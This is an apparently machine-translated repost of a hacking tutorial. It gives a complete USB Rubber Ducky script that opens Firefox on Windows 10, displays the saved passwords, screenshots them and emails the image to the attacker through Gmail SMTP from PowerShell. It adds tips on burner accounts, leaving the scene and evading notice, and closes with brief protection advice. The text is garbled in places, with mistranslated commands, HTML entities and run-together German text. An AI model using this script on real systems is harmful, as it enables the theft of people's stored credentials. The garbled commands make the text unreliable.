قالب وردپرس درنا توس
Home / Tips and Tricks / How to Steal User Name and Password Stored User Names and Passwords in Firefox on Windows 10 Using a USB Rubber Ducky «Zero Byte :: WonderHowTo

How to Steal User Name and Password Stored User Names and Passwords in Firefox on Windows 10 Using a USB Rubber Ducky «Zero Byte :: WonderHowTo



Many people still rely on their web browser to remember every password on an online account. If you're one of these users, you'll need to use a more secure method of managing passwords because the passwords stored in the browser are hacker gold mines. With a USB rubber ducky and physical access to your computer, you can have a screenshot of all your access data in your inbox in less than 60 seconds.

With virtually all services switching to the Internet, more and more passwords are needed to manage accounts, perform actions, interact, and view content. All of these web services have different arbitrary password requirements (such as you, college admissions sites), making it harder for someone to use a single password for multiple websites, a practice nobody should have done in the beginning.

Each website account requires that it prevents any account from being compromised due to user infringement. Due to the terrible human memory, most users usually only need to remind their web browser of all credentials. This is convenient, but not very secure, unless all credentials are locked with a master password. For this reason, safer password administrators such as LastPass have become popular (even if they are not protected against hackers).

When prompted by Firefox, you are asked if the browser should save my password.

How to Save Web User Credentials

Some browsers store user credentials locally in plain text. Others have implemented security features to prevent random users from displaying passwords of the primary account holder. For example, Google Chrome requires you to sign in to your Microsoft account before you can see your credentials on a Windows 10 computer. Just a simple security measure like this prevents random people from displaying your passwords if you do not lock your computer.

The Google Chrome security prompt is enabled Windows 10.

Firefox makes your passwords unimaginable. With just a few clicks (Menu -> Options -> Privacy & Security -> Saved registrations -> Show passwords -> Yes) anyone can see the credentials that you trusted with Firefox.

It's an incredible overview of browsers announcing themselves as a more privacy-oriented network. Although Firefox provides an option for the master password required when clicking the "Show passwords" button, it is not enabled by default, ie it is enabled. Most users will probably never open the settings. You will know that there is a master password. When I see that, I feel like Mozilla is begging for user credentials to be compromised.

Although it is not known exactly how many users store passwords in browsers, we can get an idea of ​​them. A 2014 report showed that 81% of study participants used a browser-based password manager (but these results also included services like Apple Keychain, not really the same). In a 2016 report, the number of users was reversed, with 18% of users relying on the built-in password managers in browsers. Whether it's 81 or 18, it's a large population vulnerable to the attack we're dealing with today, as long as they do not know master passwords.

What is a USB Rubber Ducky?

We could just start by accessing third-party computers and manually navigating to the location of credentials, it would be much more efficient and discreet to use USB Rubber Ducky, a device developed by Hak5 and externally A harmless thumb looks like a drive, but acts as a fully scriptable keyboard once it's connected to a computer.

Choose a USB Rubber Ducky from Amazon | Hak5

Since a computer does not recognize the difference between a human using a keyboard and a preprogrammed device, the USB Rubber Ducky can do many things, just as if someone typed something. Since the USB Rubber Ducky can only interact with a computer as with another keyboard, the Ducky Script depends on which device the device is aimed for. Everything from the operating system to the installed software version, and even how quickly or slowly the computer has to adjust the Ducky script.

How To Perform This Attack

To show what the USB Rubber Ducky is capable of, we will be breaking down the attack into just a few steps – first we opened the Rubber Ducky Firefox and second it navigated to the location Third, a screen hot the credentials created. Next, the screenshot will be saved on the C drive. Finally, the screenshot of the credentials will be sent by e-mail to an e-mail address of your choice.

What You'll Need

This entire attack is dependent on the Hak5 USB Rubber Ducky, available for $ 45 . own shop, Amazon and possibly other retailers online. It's a fair price for the many different exploits you can use it for. Together with the USB Rubber Ducky, you'll need a microSD card to store the Ducky scripts and something you can read and write on your computer.

Software Requires Java Installed on Your Computer Use Hak5's free Ducky Encoder app, which is required to load the script onto the hacking device. I would also recommend setting up a burner email account that is responsible for sending the email, as the password for the sender's account is entered directly into the PowerShell console on the target's computer.

Step 1: Open Script the Ducky to Firefox

The first phase of the attack is the simplest – all we have to do is open Firefox and navigate to where all user credentials are stored.

The only thing we need to keep in mind with the USB Rubber Ducky is that it only acts as a keyboard. Therefore, all GUI interactions must be performed with keyboard shortcuts. For advanced GUI manipulation, you can view Python libraries like PyWinAuto, but we'll save it for another time.

If you want to start writing your script, just open any text editor of your choice and enter the first seven lines (see below).

  DELAY 2000
GUI r
DELAY 500
STRING Firefox
DELAY 1000
ENTER
DELAY 4000 

Abort this part of the script:

Cancel these 7 lines line by line.

  DELAY 2000 

The above line tells the Rubber Ducky to wait for 2,000 milliseconds. The DELAY command is useful if you think the Rubber Ducky is typing commands faster than a computer can respond. In this case, at the beginning we only use it as a small buffer so that Windows can recognize the new device that has just been connected to the device.

  GUI r
DELAY 500 

The GUI command presses the Windows key. If the Rubber Ducky were to be plugged into a MacBook, this would be the Command button. Pressing Windows in combination with r opens the Quick Launch menu where Windows users can run any program as an administrator. Then we add DELAY for half a second so that the computer can open the dialog box for the run.

  STRING firefox
DELAY 1000 

The above command instructs the USB Rubber Ducky to enter everything after the STRING command. In this case, it is just "Firefox". Then, just one second DELAY before the next command.

  ENTER
DELAY 4000 

The above lines merely instruct the USB Rubber Ducky to press the ENTER key to start Firefox. The last DELAY is four seconds to give Firefox enough time to open.

Step 2: Write the Ducky to reveal the passwords

Now we have told the USB Rubber Ducky to open Firefox to go where Firefox stores the passwords. Navigating to the location of the passwords is pretty straightforward – just add the following lines to your script:

  CTRL L
DELAY 250
STRING via: Preferences # Privacy
ENTER
DELAY 500
TAB
REPEAT 14
ENTER
DELAY 250
TAB
REPEAT 3
ENTER
DELAY 250
ENTER
DELAY 500 

Aborting this part of the script:

Let's take a closer look at what all this will do when the USB Rubber Ducky is connected to the target's computer.

  CTRL L
DELAY 250 

CTRL L is the key combination used to select the address bar. Follow him with a small DELAY .

  STRING via: Preferences # privacy 

The Rubber Ducky then enters the location of the browser's security settings in the address bar, thanks to the STRING command.

  ENTER
DELAY 500 

Once the ENTER button is pressed, the Rubber Ducky should successfully navigate to the Privacy & Security screen. Then add another small DELAY . This is the setting of Privacy & Security in Firefox:

If we scroll down a bit, we see the button of interest: "Saved registrations".

To make the USB Rubber Ducky choose the "Saved Registrations" button since we only To use keyboard shortcuts, you must enter the correct number of tabs and then press ENTER .

As you will see in the screenshot above, there is the option "Use Master Password" Users can benefit from it, just probably they do not even know it's there. Just let it know that if someone uses a master password here, the payload will fail and there is no way to know unless you try.

  TAB
REPEAT 14 

Through a simple manual test, I found that 15 tabs are required to navigate to the button. One quick way to tell the USB Rubber Ducky to do a repetitive task is to write the repeated command first, in this case add TAB and in the next line REPEAT , followed by the number of times you want to repeat this command.

  ENTER
DELAY 250 

After the "Saved registrations" button is selected, the command ENTER opens the Saved registrations screen, where all stored accounts and usernames are physically displayed. The passwords are not yet visible. Therefore, you must follow a similar procedure to navigate to the Show Passwords button and then select Yes. However, do not forget to add a small DELAY before performing the next task.

  TAB
REPEAT 3 

The key is pressed four times to select the Show Passwords option. It's the same concept as above.

  ENTER
DELAY 250 

After the Show Passwords option is selected, ENTER starts the process of displaying all the passwords on the screen. Follow it with a small DELAY before we move on.

  ENTER
DELAY 500 

After clicking on the "Show Passwords" button you will be asked to confirm that you want to display the passwords. By simply pressing ENTER the "Yes" is confirmed. Then add DELAY before we take the screenshot of what appears.

Step 3: Write the Ducky to take a screenshot [19659007] After the passwords are displayed, it's time to take a screenshot of the information visible on the screen. To do this we add the following to the script:

  PRINTSCREEN
OLD F4
DELAY 100 

Aborting this part of the script:

The demolition of these three lines is simple enough.

  PRINTSCREEN 

The command PRINTSCREEN creates a screenshot of the screen. This does not show every password and account, but only the first ones that appear on the screen, which is usually enough to get what we need.

  ALT F4
DELAY 100 

Finally, we close Firefox with ALT F4 to minimize the evidence left by the USB Rubber Ducky. This will quit Firefox, making it look like it was never opened, and add DELAY before saving the image.

Step 4: Script the Ducky to save the screenshot

Now a screenshot of the user's credentials are in the clipboard of the computer. We need to save the file with PowerShell as a PNG file. For those who do not know, PowerShell is a more powerful version of the standard Windows command prompt. Many actions can be performed without a graphical user interface, using some PowerShell scripts instead, which is very useful to all users of USB Rubber Ducky.

Now we add the part of the script responsible for saving the image:

  GUI r
DELAY 250
STRING PowerShell
DELAY 250
ENTER
DELAY 250
STRING $ screenshot = gcb format image
ENTER
STRING $ path = & # 39; C:  Users  Public  passwords.png & # 39;
ENTER
STRING $ screenshot.Save ($ path, & # 39; png & # 39;)
ENTER 

Aborting this part of the script:

This part of the script writes only a few lines of PowerShell script. Since there are already PowerShell tutorials on zero bytes, I'll keep the explanation short of the rest of the code. Simply put, it saves everything on the clipboard as a PNG file for the public user on drive C. For security reasons, Windows can not save files directly to drive C using PowerShell.

  GUI r
DELAY 250 

The first four lines of this piece of code are very similar to opening Firefox. The first line with GUI r presses the key Windows at the same time as the key r which opens the window for administrators. Add a small DELAY to continue.

  STRING PowerShell
DELAY 250 

The above lines tell the USB Rubber Ducky to enter everything after the STRING command. In this case, it is "powershell". Then we add a small DELAY to continue.

  ENTER
DELAY 250 

The above lines instruct the run window to open PowerShell with ENTER then we insert DELAY to continue.

  STRING $ screenshot = gcb format image
ENTER 

The lines above begin with the PowerShell commands instructing the system to grab the clipboard in STRING and then ENTER . STRING $ path = & # 39; C: Users Public passwords.png & # 39;
ENTER

The above command STRING specifies where in this case the image is to be stored to the public user on drive C. Then press ENTER to confirm. 19659032] STRING $ screenshot.Save ($ path, & # 39; png & # 39;)
ENTER

We now use the command save STRING to save it where we selected it. ENTER was hit to complete the save.

Step 5: E-mail the screenshot to you

Now that we've created a picture of all visible credentials of the target, we need to restore the image. And what would be more convenient than having a screenshot of all passwords displayed directly in your email inbox? For this last part of the script, add the following text:

  STRING $ SMTPServer = & smtp.gmail.com & # 39;
ENTER
STRING $ SMTPInfo = Net.Mail.SmtpClient New-Object ($ SmtpServer, 587)
ENTER
STRING $ SMTPInfo.EnableSsl = $ true
ENTER
STRING $ SMTPInfo.Credentials = New-Object System.Net.NetworkCredential (& # 39; [SENDER EMAIL] & # 39 ;, & # 39; [SENDER PASSWORD] & # 39 ;;);
ENTER
STRING $ ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ ReportEmail.From = & # 39; [SENDER EMAIL] & # 39;
ENTER
STRING $ ReportEmail.To.Add (& # 39; [RECEIVER EMAIL] & # 39;
ENTER
STRING $ ReportEmail.Subject = & USER CREDENTIALS & # 39;
ENTER
STRING $ ReportEmail.Body = & # 39; Here are the usernames I found for you. Quack Quack. & # 39;
ENTER
STRING $ ReportEmail.Attachments.Add (& # 39; C:  Users  Public  passwords.png & # 39;)
ENTER
STRING $ SMTPInfo.Send ($ ReportEmail)
ENTER
DELAY 3000
Leave STRING
ENTER 

Aborting this part of the script:

Most of it is simple Ducky scripting that enters the PowerShell code that uses the built-in Simple Mail Transfer Protocol (SMTP) function. Much of this portion of the script was inspired by the Chrome Password Stealer created by Nuk3leus on GitHub.

  STRING $ SMTPServer = & smtp.gmail.com & # 39;
ENTER
STRING $ SMTPInfo = Net.Mail.SmtpClient New-Object ($ SmtpServer, 587)
ENTER
STRING $ SMTPInfo.EnableSsl = $ true
ENTER
STRING $ SMTPInfo.Credentials = New-Object System.Net.NetworkCredential (& # 39; [SENDER EMAIL] & # 39 ;, & # 39; [SENDER PASSWORD] & # 39 ;;);
ENTER 

It is very important to remember to set [SENDER EMAIL] and [SENDER PASSWORD] to the e-mail address and password of the e-mail account that sends the screenshot. I would advise to create a new e-mail account as the password is entered directly on the screen.

  STRING $ ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ ReportEmail.From = & # 39; [SENDER EMAIL] & # 39;
ENTER
STRING $ ReportEmail.To.Add (& # 39; [RECEIVER EMAIL] & # 39;
ENTER 

Finally, replace [SENDER EMAIL] and [RECEIVER EMAIL] where the latter is the email account to which the screenshot will be sent. I'd also advise against using your actual email accounts because an experienced user will be able to view his PowerShell history and clearly see your email addresses.

  STRING $ ReportEmail.Subject = & USER CREDENTIALS & # 39;
ENTER
STRING $ ReportEmail.Body = & # 39; Here are the usernames I found for you. Quack Quack. & # 39;
ENTER
STRING $ ReportEmail.Attachments.Add (& # 39; C:  Users  Public  passwords.png & # 39;)
ENTER
STRING $ SMTPInfo.Send ($ ReportEmail)
ENTER
DELAY 3000
Leave STRING
ENTER 

The rest of this script just inserts a subject and a short message into the body of the email, sends it, and then quits.
After that, the script is ready and ready to be loaded onto the USB Rubber Ducky

Step 6: Compile your script and load it on the Ducky

After the script finishes, save it, and we need to convert the text file into a format that the USB Rubber Ducky can read. Then we invite you to the USB Rubber Ducky. Before we get to that, here's the final result of the Ducky script from the previous five steps you should save as a text file.

In Ducky Script, REM means a comment and is not encoded in the script. It is for reference only when scripts are shared.

  REM REM Author: @ nickgodshall / koufax
REM Rubber Ducky Firefox Password Stealer
REM target: Windows 10 / Firefox V 66.0.2
REM Description: Opens Firefox, navigates to the preferences page and
REM scans the stored user credentials. Then the screenshot will be saved
Send REM to a public user and send the screenshot by e-mail to your e-mail. Written
REM for the zero-byte tutorial. Remember to replace all instances
REM of [SENDER EMAIL][SENDER PASSWORD]  and [RECEIVER EMAIL] too
REM their corresponding values.

DELAY 2000
REM ------------- Open Firefox --------------------------------- - ----
GUI r
DELAY 500
STRING Firefox
DELAY 1000
ENTER
DELAY 4000
REM ------------- Navigate to the settings and look at the passwords -
CTRL L
DELAY 250
STRING via: Preferences # Privacy
ENTER
DELAY 500
TAB
REPEAT 14
ENTER
DELAY 250
TAB
REPEAT 3
ENTER
DELAY 250
ENTER
DELAY 500
PRINT SCREEN
OLD F4
REM ------------- Save screenshot as png ----------------------------
DELAY 100
GUI r
DELAY 250
STRING PowerShell
DELAY 250
ENTER
DELAY 250
STRING $ screenshot = gcb format image
ENTER
STRING $ path = & # 39; C:  Users  Public  passwords.png & # 39;
ENTER
STRING $ screenshot.Save ($ path, & # 39; png & # 39;)
ENTER
REM ------------- E-mail screenshot as attachment -----------------
REM ------------- Enter the e-mail access data here ----------------------
STRING $ SMTPServer = "smtp.gmail.com"
ENTER
STRING $ SMTPInfo = Net.Mail.SmtpClient New-Object ($ SmtpServer, 587)
ENTER
STRING $ SMTPInfo.EnableSsl = $ true
ENTER
STRING $ SMTPInfo.Credentials = New-Object System.Net.NetworkCredential (& # 39; [SENDER EMAIL] & # 39 ;, & # 39; [SENDER PASSWORD] & # 39 ;;);
ENTER
STRING $ ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ ReportEmail.From = & # 39; [SENDER EMAIL] & # 39;
ENTER
STRING $ ReportEmail.To.Add (& # 39; [RECEIVER EMAIL] & # 39;
ENTER
STRING $ ReportEmail.Subject = & USER CREDENTIALS & # 39;
ENTER
STRING $ ReportEmail.Body = & # 39; Here are the usernames I found for you. Quack Quack. & # 39;
ENTER
STRING $ ReportEmail.Attachments.Add (& # 39; C:  Users  Public  passwords.png & # 39;)
ENTER
STRING $ SMTPInfo.Send ($ ReportEmail)
ENTER
DELAY 3000
Leave STRING
ENTER 

Next, we use the Ducky Encoder software developed by Hak5 to encode the text file. To install the Ducky encoder, clone the GitHub repository with the following command in a handy directory:

  git clone https://github.com/hak5darren/USB-Rubber-Ducky.git[19659033nachDuckyEncoderwirdinstalliertNavigierenSieineinerEingabeaufforderungzuseinemVerzeichnisStellenSiedannsicherdassSieeinemicroSD-KarteinIhrenComputereinsteckenundgebenSiediesenBefehleinumdieTextdateiineinDucky-lesbaresFormatzukonvertieren:

  java -jar ~ / Downloads / duckencoder.jar -i [Directory of script text file] - o E:  inject.bin 

After a few seconds, the script should be converted and loaded onto the microSD card. Be sure to check which drive letter is assigned to the microSD card as it is not "E" as in my example. After completing this step, you can insert your microSD card into the USB Rubber Ducky and execute the attack!

Step 7: Test the payload on your computer

Now the BIN file is placed on the USB stick The RubberDucky microSD card is the time to put it to the test. I would first test it on your own computer to make sure that you have not made any mistakes and it works as intended. After the script has been tested, you can start searching for a destination.

If you followed all the instructions in the article correctly and no master password was set in Firefox, your script should work. If you have not been redirected or the script has not worked for some other reason, you can download the Firefox Password Stealer Ducky Script from my GitHub page with the command

  git clone https: // github. com / nsgodshall / FF-password-stealer.git 

Step 8: Deploying the Payload on the Destination Computer

For the script to work, the destination must meet some criteria. As previously described, this script applies only to users running current versions of Firefox on Windows 10. In addition, the computer of the target computer must have a permanent Internet connection so that the screenshot can be restored by e-mail. After all, the user does not have to set a primary password for Firefox passwords, but you can not figure this out first.

If you know a device that meets all criteria, this is only a matter of time. The target unlocks the device, even if it only takes a minute. This short time will be more than enough time to strike. Simply plug the USB Rubber Ducky into an open USB port, and when the green light comes on, sit down and let the Rubber Ducky cast its spell.

The Green Light of Success!

After giving the script about thirty seconds, you can remove the USB Rubber Ducky and escape the scene. Once you have safely left the target computer, you should find a new email with your credentials in your Inbox.

Success! We have received an e-mail, now let's see which screenshot he has sent.

Success again! We have successfully received a screenshot with completely real usernames and passwords from the target's computer.

Protecting yourself from attacks like this

is easy not to trust them at all. Set up a master password for storing passwords from Firefox.

You can also use another web browser, or even better, use a trusted password manager such as LastPass or KeePassX whose main task is to back up your account passwords. These apps can automatically generate and encrypt passwords for each service you use. This means that you need to remember only one main password for each website instead of a new password.

In addition, if you want to see if anyone has compromised On your computer, you can use PowerShell to check the most recent PowerShell activity with the following PowerShell command:

  (Get-PSReadlineOption) .HistorySavePath 

This returns the directory of a text file containing the history of all recently used PowerShell commands even if someone closes the PowerShell, you will still be able to see what he has done.

I hope you enjoyed reading this guide and that you have all learned something new. If anything, you now know that not even companies like Mozilla can be trusted with our sensitive information. If you have problems with the script or have any other questions, feel free to visit Twitter @nickgodshall .

nicht verpassen Android-Telefon & USB-Gummi Ducky

Titelbilder und Screenshots sowie GIF von Koufax / Null Byte




Source link